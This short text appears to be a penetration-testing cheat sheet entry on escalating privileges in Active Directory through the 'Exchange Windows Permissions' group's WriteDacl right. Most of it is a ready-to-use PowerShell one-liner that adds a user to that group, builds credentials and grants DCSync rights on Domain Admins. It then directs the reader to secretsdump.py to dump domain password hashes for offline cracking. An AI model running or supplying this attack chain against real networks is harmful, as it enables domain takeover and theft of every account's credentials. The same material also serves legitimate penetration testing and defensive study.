The Windows Exchange Permissions group has WriteDacl permissions allows the members to modify the DACL (Discretionary Access Control List). This allows the user to grant any privilege on the object.
First, you must be authenticated to the DC with the proper permissions.
Oneliner to grant Windows Exchange permissions
Add-DomainGroupMember -Identity 'Exchange Windows Permissions' -Members <username>; $username = "<domain>\<username>"; $password = "<password>"; $secstr = New-Object -TypeName System.Security.SecureString; $password.ToCharArray() | ForEach-Object {$secstr.AppendChar($_)}; $cred = new-object -typename System.Management.Automation.PSCredential -argumentlist $username, $secstr; Add-DomainObjectAcl -Credential $Cred -PrincipalIdentity '<username>' -TargetIdentity '<domain>.local\Domain Admins' -Rights DCSyncOnce Permissions are obtained, use secretsdump.py to dump the hashes which can be cracked offline